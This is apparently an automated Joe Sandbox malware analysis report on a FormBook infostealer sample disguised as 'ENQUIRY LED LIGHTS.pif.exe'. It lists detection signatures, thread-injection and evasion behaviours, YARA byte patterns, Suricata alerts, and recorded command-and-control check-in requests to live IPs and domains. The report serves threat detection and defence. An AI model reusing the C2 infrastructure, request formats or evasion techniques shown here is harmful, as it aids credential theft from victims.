Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ENQUIRY LED LIGHTS.pif.exe

Overview

General Information

Sample name:ENQUIRY LED LIGHTS.pif.exe
Analysis ID:1550102
MD5:120c54a53b6678586cc21f6eefb3c3a5
SHA1:52b149e7d7bfd16ef2b108e4ef4d8c6cd28cfab5
SHA256:8311884c536e402615c44c0010553cb85718a79a82fa59f90bbdc79321cc60c5
Tags:exepifuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ENQUIRY LED LIGHTS.pif.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe" MD5: 120C54A53B6678586CC21F6EEFB3C3A5)
    • ENQUIRY LED LIGHTS.pif.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe" MD5: 120C54A53B6678586CC21F6EEFB3C3A5)
    • ENQUIRY LED LIGHTS.pif.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe" MD5: 120C54A53B6678586CC21F6EEFB3C3A5)
      • bdtKgWWjtPR.exe (PID: 4432 cmdline: "C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchFilterHost.exe (PID: 7892 cmdline: "C:\Windows\SysWOW64\SearchFilterHost.exe" MD5: 1D221E674AC34BC114C91B8D56468315)
          • bdtKgWWjtPR.exe (PID: 2332 cmdline: "C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f190:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1725f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2fb9f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17c6e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ef9f:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x1706e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T13:41:20.543853+010020229301A Network Trojan was detected52.149.20.212443192.168.2.449735TCP
            2024-11-06T13:41:42.019215+010020229301A Network Trojan was detected172.202.163.200443192.168.2.451155TCP
            2024-11-06T13:41:43.858729+010020229301A Network Trojan was detected172.202.163.200443192.168.2.451156TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T13:42:07.383224+010020507451Malware Command and Control Activity Detected192.168.2.4512013.33.130.19080TCP
            2024-11-06T13:42:36.169295+010020507451Malware Command and Control Activity Detected192.168.2.45135875.2.103.2380TCP
            2024-11-06T13:42:59.693800+010020507451Malware Command and Control Activity Detected192.168.2.451430172.67.163.17180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T13:42:07.383224+010028554651A Network Trojan was detected192.168.2.4512013.33.130.19080TCP
            2024-11-06T13:42:36.169295+010028554651A Network Trojan was detected192.168.2.45135875.2.103.2380TCP
            2024-11-06T13:42:59.693800+010028554651A Network Trojan was detected192.168.2.451430172.67.163.17180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T13:42:28.498327+010028554641A Network Trojan was detected192.168.2.45131575.2.103.2380TCP
            2024-11-06T13:42:31.003463+010028554641A Network Trojan was detected192.168.2.45132975.2.103.2380TCP
            2024-11-06T13:42:33.735051+010028554641A Network Trojan was detected192.168.2.45134575.2.103.2380TCP
            2024-11-06T13:42:50.990838+010028554641A Network Trojan was detected192.168.2.451427172.67.163.17180TCP
            2024-11-06T13:42:53.615741+010028554641A Network Trojan was detected192.168.2.451428172.67.163.17180TCP
            2024-11-06T13:42:56.271768+010028554641A Network Trojan was detected192.168.2.451429172.67.163.17180TCP
            2024-11-06T13:43:06.146500+010028554641A Network Trojan was detected192.168.2.451431162.0.231.20380TCP
            2024-11-06T13:43:08.752984+010028554641A Network Trojan was detected192.168.2.451432162.0.231.20380TCP
            2024-11-06T13:43:11.920944+010028554641A Network Trojan was detected192.168.2.451433162.0.231.20380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: ENQUIRY LED LIGHTS.pif.exeReversingLabs: Detection: 26%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: ENQUIRY LED LIGHTS.pif.exeJoe Sandbox ML: detected
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bdtKgWWjtPR.exe, 00000007.00000000.1985350968.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp, bdtKgWWjtPR.exe, 00000009.00000000.2288490724.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdbUGP source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ENQUIRY LED LIGHTS.pif.exe, ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdb source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_032AC410
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 4x nop then xor eax, eax8_2_03299BC0
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 4x nop then mov ebx, 00000004h8_2_054904E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:51201 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51201 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51329 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51315 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51345 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:51358 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51358 -> 75.2.103.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51427 -> 172.67.163.171:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51428 -> 172.67.163.171:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51429 -> 172.67.163.171:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:51430 -> 172.67.163.171:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:51430 -> 172.67.163.171:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51432 -> 162.0.231.203:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51431 -> 162.0.231.203:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:51433 -> 162.0.231.203:80
            Source: Joe Sandbox ViewIP Address: 75.2.103.23 75.2.103.23
            Source: Joe Sandbox ViewIP Address: 162.0.231.203 162.0.231.203
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:51155
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:51156
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:49735
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /3wgj/?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.ontoweightloss.healthConnection: closeUser-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
            Source: global trafficHTTP traffic detected: GET /b5w1/?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.asklifeclarity.shopConnection: closeUser-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
            Source: global trafficHTTP traffic detected: GET /umew/?ZtyPTl=QXTWCFaCrqsBcZ0jvGl1ttfHxXcpVNWda4HOn4zcEeaqQvbbnXannTD248WElJ9FFMtE83bbHMtecG5XDZ8D8EJV2R1Y4Xui2kuIw8EG0Z1Ay2DF3ANMa14=&ZbwL=jPj4WxVP-Pg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.waidzeitcz.shopConnection: closeUser-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
            Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.ontoweightloss.health
            Source: global trafficDNS traffic detected: DNS query: www.asklifeclarity.shop
            Source: global trafficDNS traffic detected: DNS query: www.worldoffun.online
            Source: global trafficDNS traffic detected: DNS query: www.waidzeitcz.shop
            Source: global trafficDNS traffic detected: DNS query: www.windowmart.online
            Source: unknownHTTP traffic detected: POST /b5w1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.asklifeclarity.shopConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: no-cacheOrigin: http://www.asklifeclarity.shopReferer: http://www.asklifeclarity.shop/b5w1/User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 MobileData Raw: 5a 74 79 50 54 6c 3d 57 78 67 36 44 59 6a 6b 45 50 75 43 6b 7a 78 6e 43 4b 37 43 4e 44 49 37 5a 36 62 36 36 6f 4a 74 72 73 75 67 79 34 34 75 65 71 78 47 49 57 55 4d 75 45 34 49 67 6f 36 32 51 47 5a 77 67 54 64 32 35 30 39 66 43 69 50 35 79 4f 74 70 30 45 39 39 70 2f 6b 54 54 6d 57 52 4d 69 6f 58 5a 30 58 35 59 6f 6f 5a 33 7a 59 57 37 49 76 35 69 57 48 6d 71 75 39 6b 42 53 75 61 41 2b 5a 65 5a 55 67 32 6b 2b 4e 6f 61 52 51 59 42 50 61 66 44 6e 47 57 4e 4f 75 35 34 39 6b 50 67 63 30 53 67 5a 51 45 56 72 76 78 47 30 36 5a 71 61 31 2f 4c 78 41 6d 58 42 63 39 38 76 5a 31 72 48 53 5a 2b 73 57 43 37 41 3d 3d Data Ascii: ZtyPTl=Wxg6DYjkEPuCkzxnCK7CNDI7Z6b66oJtrsugy44ueqxGIWUMuE4Igo62QGZwgTd2509fCiP5yOtp0E99p/kTTmWRMioXZ0X5YooZ3zYW7Iv5iWHmqu9kBSuaA+ZeZUg2k+NoaRQYBPafDnGWNOu549kPgc0SgZQEVrvxG06Zqa1/LxAmXBc98vZ1rHSZ+sWC7A==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 12:42:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingX-Powered-By: PHP/8.2.19Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.waidzeitcz.shop/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLF1EiCwzp0ip6TLXPZbsx%2FOX7C8UYiqG3GfV0vU5hz3fFNUDNMcl733jJu8e%2FuBmEnjfqgSJRDOBBV9Ou2UFrXWbeUoFad9dv%2Bb3V1ItCdFkrTfh3rNVMvgxHhRF4%2BCSyO1QPAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8de52a9f998b4635-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1072&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 36 61 34 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 63 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: 76a4<!DOCTYPE html><html lang="cs" prefix="og: https://ogp.me/ns#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 12:43:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 12:43:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
